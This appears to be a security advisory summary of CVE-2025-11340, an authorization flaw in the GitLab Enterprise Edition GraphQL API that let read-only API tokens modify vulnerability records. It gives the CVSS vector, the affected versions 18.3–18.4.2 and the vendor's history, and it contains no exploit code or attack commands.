Introduction
Unauthorized modification of vulnerability records in GitLab Enterprise Edition can disrupt security workflows and compliance reporting. CVE-2025-11340 demonstrates how a flaw in GraphQL API authorization allowed authenticated users with read-only API tokens to perform write operations on critical security data, impacting organizations relying on GitLab for vulnerability management.
GitLab is a widely adopted DevOps platform used by enterprises and open-source communities worldwide. It provides source code management, CI/CD, and integrated security features for millions of users. The Enterprise Edition (EE) is the premium offering, including advanced security and compliance tools.
Technical Information
CVE-2025-11340 is classified as CWE-863 (Incorrect Authorization). The vulnerability is present in the GraphQL API of GitLab EE, specifically in the mutation logic that handles vulnerability records. The intended design is that API tokens with the read_api
scope are restricted to read-only operations, while tokens with the broader api
scope can perform both read and write actions.
Due to incorrect scoping of certain GraphQL mutations, users authenticated with read_api
tokens could invoke write operations on vulnerability records. This bypassed the expected permission model and allowed privilege escalation from read-only to write access. The vulnerability affects the integrity of vulnerability data but does not impact confidentiality or availability. The CVSS v3.1 vector is:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N
This means:
- Network exploitable
- Low attack complexity
- Requires low-privilege authentication (read-only token)
- No user interaction needed
- Changed scope (impacts resources outside the vulnerable component's security boundary)
- High integrity impact
- No confidentiality or availability impact
The root cause is insufficient permission checks on GraphQL mutations related to vulnerability management. No public code snippets or proof of concept are available. The flaw was discovered internally by a GitLab engineer, not through exploitation in the wild.
Affected Systems and Versions
- Product: GitLab Enterprise Edition (EE) only
- Affected versions:
- 18.3 through 18.3.4
- 18.4 through 18.4.2
- Only configurations where the GraphQL API is exposed and read-only API tokens are used for vulnerability management operations are vulnerable.
- Community Edition (CE) is not affected.
Vendor Security History
GitLab regularly releases security updates and maintains a public bug bounty program. Recent security advisories have addressed multiple authorization and GraphQL-related vulnerabilities, including:
- CVE-2025-10004 (GraphQL API denial of service)
- CVE-2025-9825 (GraphQL API missing authorization for CI/CD jobs)
- CVE-2025-11042, CVE-2025-10867 (GraphQL API denial of service)
The vendor typically releases patches promptly and provides detailed advisories. Authorization logic in complex API features has been a recurring challenge, but GitLab's response process is transparent and mature.